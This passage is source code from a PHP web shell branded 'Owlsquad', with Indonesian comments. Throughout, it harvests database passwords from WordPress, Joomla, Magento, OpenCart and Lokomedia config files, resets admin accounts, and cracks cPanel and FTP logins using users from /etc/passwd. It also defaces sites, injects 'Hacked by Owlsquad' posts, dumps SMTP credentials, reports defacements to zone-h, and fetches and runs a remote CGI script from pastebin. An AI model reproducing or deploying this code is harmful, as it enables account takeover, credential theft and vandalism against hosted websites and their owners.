751.             $user_baru = $_POST['user_baru'];
752.             $pass_baru = md5($_POST['pass_baru']);
753.             $conf = $_POST['config_dir'];
754.             $scan_conf = scandir($conf);
755.             foreach($scan_conf as $file_conf) {
756.                 if(!is_file("$conf/$file_conf")) continue;
757.                 $config = file_get_contents("$conf/$file_conf");
758.                 if(preg_match("/JConfig|joomla/",$config)) {
759.                     $dbhost = ambilkata($config,"host = '","'");
760.                     $dbuser = ambilkata($config,"user = '","'");
761.                     $dbpass = ambilkata($config,"password = '","'");
762.                     $dbname = ambilkata($config,"db = '","'");
763.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
764.                     $prefix = $dbprefix."users";
765.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
766.                     $db = mysql_select_db($dbname);
767.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
768.                     $result = mysql_fetch_array($q);
769.                     $id = $result['id'];
770.                     $site = ambilkata($config,"sitename = '","'");
771.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
772.                     echo "Config => ".$file_conf."<br>";
773.                     echo "CMS => Joomla<br>";
774.                     if($site == '') {
775.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
776.                     } else {
777.                         echo "Sitename => $site<br>";
778.                     }
779.                     if(!$update OR !$conn OR !$db) {
780.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
781.                     } else {
782.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
783.                     }
784.                     mysql_close($conn);
785.                 } elseif(preg_match("/WordPress/",$config)) {
786.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
787.                     $dbuser = ambilkata($config,"DB_USER', '","'");
788.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
789.                     $dbname = ambilkata($config,"DB_NAME', '","'");
790.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
791.                     $prefix = $dbprefix."users";
792.                     $option = $dbprefix."options";
793.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
794.                     $db = mysql_select_db($dbname);
795.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
796.                     $result = mysql_fetch_array($q);
797.                     $id = $result[ID];
798.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
799.                     $result2 = mysql_fetch_array($q2);
800.                     $target = $result2[option_value];
801.                     if($target == '') {
802.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
803.                     } else {
804.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
805.                     }
806.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
807.                     echo "Config => ".$file_conf."<br>";
808.                     echo "CMS => Wordpress<br>";
809.                     echo $url_target;
810.                     if(!$update OR !$conn OR !$db) {
811.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
812.                     } else {
813.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
814.                     }
815.                     mysql_close($conn);
816.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
817.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
818.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
819.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
820.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
821.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
822.                     $prefix = $dbprefix."admin_user";
823.                     $option = $dbprefix."core_config_data";
824.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
825.                     $db = mysql_select_db($dbname);
826.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
827.                     $result = mysql_fetch_array($q);
828.                     $id = $result[user_id];
829.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
830.                     $result2 = mysql_fetch_array($q2);
831.                     $target = $result2[value];
832.                     if($target == '') {
833.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
834.                     } else {
835.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
836.                     }
837.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
838.                     echo "Config => ".$file_conf."<br>";
839.                     echo "CMS => Magento<br>";
840.                     echo $url_target;
841.                     if(!$update OR !$conn OR !$db) {
842.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
843.                     } else {
844.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
845.                     }
846.                     mysql_close($conn);
847.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
848.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
849.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
850.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
851.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
852.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
853.                     $prefix = $dbprefix."user";
854.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
855.                     $db = mysql_select_db($dbname);
856.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
857.                     $result = mysql_fetch_array($q);
858.                     $id = $result[user_id];
859.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
860.                     if($target == '') {
861.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
862.                     } else {
863.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
864.                     }
865.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
866.                     echo "Config => ".$file_conf."<br>";
867.                     echo "CMS => OpenCart<br>";
868.                     echo $url_target;
869.                     if(!$update OR !$conn OR !$db) {
870.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
871.                     } else {
872.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
873.                     }
874.                     mysql_close($conn);
875.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
876.                     $dbhost = ambilkata($config,'server = "','"');
877.                     $dbuser = ambilkata($config,'username = "','"');
878.                     $dbpass = ambilkata($config,'password = "','"');
879.                     $dbname = ambilkata($config,'database = "','"');
880.                     $prefix = "users";
881.                     $option = "identitas";
882.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
883.                     $db = mysql_select_db($dbname);
884.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
885.                     $result = mysql_fetch_array($q);
886.                     $target = $result[alamat_website];
887.                     if($target == '') {
888.                         $target2 = $result[url];
889.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
890.                         if($target2 == '') {
891.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
892.                         } else {
893.                             $cek_login3 = file_get_contents("$target2/adminweb/");
894.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
895.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
896.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
897.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
898.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
899.                             } else {
900.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
901.                             }
902.                         }
903.                     } else {
904.                         $cek_login = file_get_contents("$target/adminweb/");
905.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
906.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
907.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
908.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
909.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
910.                         } else {
911.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
912.                         }
913.                     }
914.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
915.                     echo "Config => ".$file_conf."<br>";
916.                     echo "CMS => Lokomedia<br>";
917.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
918.                         echo $url_target2;
919.                     } else {
920.                         echo $url_target;
921.                     }
922.                     if(!$update OR !$conn OR !$db) {
923.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
924.                     } else {
925.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
926.                     }
927.                     mysql_close($conn);
928.                 }
929.             }
930.         }
931.     } else {
932.         echo "<center>
933.         <h1>Auto Edit User Config</h1>
934.         <form method='post'>
935.         DIR Config: <br>
936.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
937.         Set User & Pass: <br>
938.         <input type='text' name='user_baru' value='Owlsquad' placeholder='user_baru'><br>
939.         <input type='text' name='pass_baru' value='Owlsquad' placeholder='pass_baru'><br>
940.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
941.         </form>
942.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
943.         ";
944.     }
945. } elseif($_GET['do'] == 'cpanel') {
946.     if($_POST['crack']) {
947.         $usercp = explode("\r\n", $_POST['user_cp']);
948.         $passcp = explode("\r\n", $_POST['pass_cp']);
949.         $i = 0;
950.         foreach($usercp as $ucp) {
951.             foreach($passcp as $pcp) {
952.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
953.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
954.                     } else {
955.                         $_SESSION[$ucp] = "1";
956.                         $_SESSION[$pcp] = "1";
957.                         if($ucp == '' || $pcp == '') {
958.                            
959.                         } else {
960.                             $i++;
961.                             if(function_exists('posix_getpwuid')) {
962.                                 $domain_cp = file_get_contents("/etc/named.conf"); 
963.                                 if($domain_cp == '') {
964.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
965.                                 } else {
966.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
967.                                     foreach($domains_cp[1] as $dj) {
968.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
969.                                         $user_cp_url = $user_cp_url['name'];
970.                                         if($user_cp_url == $ucp) {
971.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
972.                                             break;
973.                                         }
974.                                     }
975.                                 }
976.                             } else {
977.                                 $dom = "<font color=red>function is Disable by system</font>";
978.                             }
979.                             echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
980.                         }
981.                     }
982.                 }
983.             }
984.         }
985.         if($i == 0) {
986.         } else {
987.             echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>Owlsquad.</font>";
988.         }
989.     } else {
990.         echo "<center>
991.         <form method='post'>
992.         USER: <br>
993.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
994.         $_usercp = fopen("/etc/passwd","r");
995.         while($getu = fgets($_usercp)) {
996.             if($getu == '' || !$_usercp) {
997.                 echo "<font color=red>Can't read /etc/passwd</font>";
998.             } else {
999.                 preg_match_all("/(.*?):x:/", $getu, $u);
1000.                 foreach($u[1] as $user_cp) {
1001.                         if(is_dir("/home/$user_cp/public_html")) {
1002.                             echo "$user_cp\n";
1003.                     }
1004.                 }
1005.             }
1006.         }
1007.         echo "</textarea><br>
1008.         PASS: <br>
1009.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1010.         function cp_pass($dir) {
1011.             $pass = "";
1012.             $dira = scandir($dir);
1013.             foreach($dira as $dirb) {
1014.                 if(!is_file("$dir/$dirb")) continue;
1015.                 $ambil = file_get_contents("$dir/$dirb");
1016.                 if(preg_match("/WordPress/", $ambil)) {
1017.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1018.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1019.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
1020.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1021.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1022.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1023.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
1024.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1025.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1026.                 } elseif(preg_match("/^[client]$/", $ambil)) {
1027.                     preg_match("/password=(.*?)/", $ambil, $pass1);
1028.                     if(preg_match('/"/', $pass1[1])) {
1029.                         $pass1[1] = str_replace('"', "", $pass1[1]);
1030.                         $pass .= $pass1[1]."\n";
1031.                     } else {
1032.                         $pass .= $pass1[1]."\n";
1033.                     }
1034.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1035.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1036.                 }
1037.             }
1038.             echo $pass;
1039.         }
1040.         $cp_pass = cp_pass($dir);
1041.         echo $cp_pass;
1042.         echo "</textarea><br>
1043.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1044.         </form>
1045.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1046.     }
1047. } elseif($_GET['do'] == 'cpftp_auto') {
1048.     if($_POST['crack']) {
1049.         $usercp = explode("\r\n", $_POST['user_cp']);
1050.         $passcp = explode("\r\n", $_POST['pass_cp']);
1051.         $i = 0;
1052.         foreach($usercp as $ucp) {
1053.             foreach($passcp as $pcp) {
1054.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
1055.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1056.                     } else {
1057.                         $_SESSION[$ucp] = "1";
1058.                         $_SESSION[$pcp] = "1";
1059.                         if($ucp == '' || $pcp == '') {
1060.                             //
1061.                         } else {
1062.                             echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1063.                             $ftp_conn = ftp_connect($ip);
1064.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1065.                             if((!$ftp_login) || (!$ftp_conn)) {
1066.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
1067.                             } else {
1068.                                 echo "[+] <font color=lime>Login Sukses</font><br>";
1069.                                 $fi = htmlspecialchars($_POST['file_deface']);
1070.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1071.                                 if($deface) {
1072.                                     $i++;
1073.                                     echo "[+] <font color=lime>Deface Sukses</font><br>";
1074.                                     if(function_exists('posix_getpwuid')) {
1075.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
1076.                                         if($domain_cp == '') {
1077.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1078.                                         } else {
1079.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1080.                                             foreach($domains_cp[1] as $dj) {
1081.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1082.                                                 $user_cp_url = $user_cp_url['name'];
1083.                                                 if($user_cp_url == $ucp) {
1084.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1085.                                                     break;
1086.                                                 }
1087.                                             }
1088.                                         }
1089.                                     } else {
1090.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1091.                                     }
1092.                                 } else {
1093.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
1094.                                 }
1095.                             }
1096.                             //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1097.                         }
1098.                     }
1099.                 }
1100.             }
1101.         }
1102.         if($i == 0) {
1103.         } else {
1104.             echo "<br>sukses deface ".$i." Cpanel by <font color=lime>Owlsquad.</font>";
1105.         }
1106.     } else {
1107.         echo "<center>
1108.         <form method='post'>
1109.         Filename: <br>
1110.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1111.         Deface Page: <br>
1112.         <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
1113.         USER: <br>
1114.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1115.         $_usercp = fopen("/etc/passwd","r");
1116.         while($getu = fgets($_usercp)) {
1117.             if($getu == '' || !$_usercp) {
1118.                 echo "<font color=red>Can't read /etc/passwd</font>";
1119.             } else {
1120.                 preg_match_all("/(.*?):x:/", $getu, $u);
1121.                 foreach($u[1] as $user_cp) {
1122.                         if(is_dir("/home/$user_cp/public_html")) {
1123.                             echo "$user_cp\n";
1124.                     }
1125.                 }
1126.             }
1127.         }
1128.         echo "</textarea><br>
1129.         PASS: <br>
1130.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1131.         function cp_pass($dir) {
1132.             $pass = "";
1133.             $dira = scandir($dir);
1134.             foreach($dira as $dirb) {
1135.                 if(!is_file("$dir/$dirb")) continue;
1136.                 $ambil = file_get_contents("$dir/$dirb");
1137.                 if(preg_match("/WordPress/", $ambil)) {
1138.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1139.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1140.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
1141.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1142.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1143.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1144.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
1145.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1146.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1147.                 } elseif(preg_match("/client/", $ambil)) {
1148.                     preg_match("/password=(.*)/", $ambil, $pass1);
1149.                     if(preg_match('/"/', $pass1[1])) {
1150.                         $pass1[1] = str_replace('"', "", $pass1[1]);
1151.                         $pass .= $pass1[1]."\n";
1152.                     }
1153.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1154.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1155.                 }
1156.             }
1157.             echo $pass;
1158.         }
1159.         $cp_pass = cp_pass($dir);
1160.         echo $cp_pass;
1161.         echo "</textarea><br>
1162.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
1163.         </form>
1164.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1165.     }
1166. } elseif($_GET['do'] == 'smtp') {
1167.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1168.     function scj($dir) {
1169.         $dira = scandir($dir);
1170.         foreach($dira as $dirb) {
1171.             if(!is_file("$dir/$dirb")) continue;
1172.             $ambil = file_get_contents("$dir/$dirb");
1173.             $ambil = str_replace("$", "", $ambil);
1174.             if(preg_match("/JConfig|joomla/", $ambil)) {
1175.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
1176.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1177.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1178.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1179.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
1180.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1181.                 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
1182.                 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
1183.                 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
1184.                 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
1185.                 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
1186.                 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
1187.             }
1188.         }
1189.     }
1190.     $smpt_hunter = scj($dir);
1191.     echo $smpt_hunter;
1192. } elseif($_GET['do'] == 'auto_wp') {
1193.     if($_POST['hajar']) {
1194.         $title = htmlspecialchars($_POST['new_title']);
1195.         $pn_title = str_replace(" ", "-", $title);
1196.         if($_POST['cek_edit'] == "Y") {
1197.             $script = $_POST['edit_content'];
1198.         } else {
1199.             $script = $title;
1200.         }
1201.         $conf = $_POST['config_dir'];
1202.         $scan_conf = scandir($conf);
1203.         foreach($scan_conf as $file_conf) {
1204.             if(!is_file("$conf/$file_conf")) continue;
1205.             $config = file_get_contents("$conf/$file_conf");
1206.             if(preg_match("/WordPress/", $config)) {
1207.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
1208.                 $dbuser = ambilkata($config,"DB_USER', '","'");
1209.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1210.                 $dbname = ambilkata($config,"DB_NAME', '","'");
1211.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
1212.                 $prefix = $dbprefix."posts";
1213.                 $option = $dbprefix."options";
1214.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1215.                 $db = mysql_select_db($dbname);
1216.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1217.                 $result = mysql_fetch_array($q);
1218.                 $id = $result[ID];
1219.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1220.                 $result2 = mysql_fetch_array($q2);
1221.                 $target = $result2[option_value];
1222.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1223.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1224.                 echo "<div style='margin: 5px auto;'>";
1225.                 if($target == '') {
1226.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1227.                 } else {
1228.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1229.                 }
1230.                 if(!$update OR !$conn OR !$db) {
1231.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1232.                 } else {
1233.                     echo "<font color=lime>sukses di ganti.</font><br>";
1234.                 }
1235.                 echo "</div>";
1236.                 mysql_close($conn);
1237.             }
1238.         }
1239.     } else {
1240.         echo "<center>
1241.         <h1>Auto Edit Title+Content WordPress</h1>
1242.         <form method='post'>
1243.         DIR Config: <br>
1244.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1245.         Set Title: <br>
1246.         <input type='text' name='new_title' value='Hacked by Owlsquad' placeholder='New Title'><br><br>
1247.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1248.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1249.         <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1250.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1251.         </form>
1252.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1253.         ";
1254.     }
1255. } elseif($_GET['do'] == 'zoneh') {
1256.     if($_POST['submit']) {
1257.         $domain = explode("\r\n", $_POST['url']);
1258.         $nick =  $_POST['nick'];
1259.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1260.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1261.         function zoneh($url,$nick) {
1262.             $ch = curl_init("http://www.zone-h.com/notify/single");
1263.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1264.                   curl_setopt($ch, CURLOPT_POST, true);
1265.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1266.             return curl_exec($ch);
1267.                   curl_close($ch);
1268.         }
1269.         foreach($domain as $url) {
1270.             $zoneh = zoneh($url,$nick);
1271.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
1272.                 echo "$url -> <font color=lime>OK</font><br>";
1273.             } else {
1274.                 echo "$url -> <font color=red>ERROR</font><br>";
1275.             }
1276.         }
1277.     } else {
1278.         echo "<center><form method='post'>
1279.         <u>Defacer</u>: <br>
1280.         <input type='text' name='nick' size='50' value='IndoXploit'><br>
1281.         <u>Domains</u>: <br>
1282.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1283.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
1284.         </form>";
1285.     }
1286.     echo "</center>";
1287. } elseif($_GET['do'] == 'cgi') {
1288.     $cgi_dir = mkdir('idx_cgi', 0755);
1289.     $file_cgi = "idx_cgi/cgi.izo";
1290.     $isi_htcgi = "AddHandler cgi-script .izo";
1291.     $htcgi = fopen(".htaccess", "w");
1292.     $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
1293.     $cgi = fopen($file_cgi, "w");
1294.     fwrite($cgi, $cgi_script);
1295.     fwrite($htcgi, $isi_htcgi);
1296.     chmod($file_cgi, 0755);
1297.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1298. } elseif($_GET['do'] == 'fake_root') {
1299.     ob_start();
1300.     $cwd = getcwd();
1301.     $ambil_user = explode("/", $cwd);
1302.     $user = $ambil_user[2];
1303.     if($_POST['reverse']) {
1304.         $site = explode("\r\n", $_POST['url']);
1305.         $file = $_POST['file'];
1306.         foreach($site as $url) {
1307.             $cek = getsource("$url/~$user/$file");
1308.             if(preg_match("/hacked/i", $cek)) {
1309.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
1310.             }
1311.         }
1312.     } else {
1313.         echo "<center><form method='post'>
1314.         Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1315.         User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1316.         Domain: <br>
1317.         <textarea style='width: 450px; height: 250px;' name='url'>";
1318.         reverse($_SERVER['HTTP_HOST']);
1319.         echo "</textarea><br>
1320.         <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
1321.         </form><br>
1322.         NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
1323.     }
1324. } elseif($_GET['do'] == 'adminer') {
1325.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1326.     function adminer($url, $isi) {
1327.         $fp = fopen($isi, "w");
1328.         $ch = curl_init();
1329.               curl_setopt($ch, CURLOPT_URL, $url);
1330.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1331.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1332.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1333.               curl_setopt($ch, CURLOPT_FILE, $fp);
1334.         return curl_exec($ch);
1335.               curl_close($ch);
1336.         fclose($fp);
1337.         ob_flush();
1338.         flush();
1339.     }
1340.     if(file_exists('adminer.php')) {
1341.         echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1342.     } else {
1343.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1344.             echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1345.         } else {
1346.             echo "<center><font color=red>gagal buat file adminer</font></center>";
1347.         }
1348.     }
1349. } elseif($_GET['do'] == 'auto_dwp') {
1350.     if($_POST['auto_deface_wp']) {
1351.         function anucurl($sites) {
1352.             $ch = curl_init($sites);
1353.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1354.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1355.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1356.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1357.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1358.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1359.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1360.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1361.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1362.             $data = curl_exec($ch);
1363.                   curl_close($ch);
1364.             return $data;
1365.         }
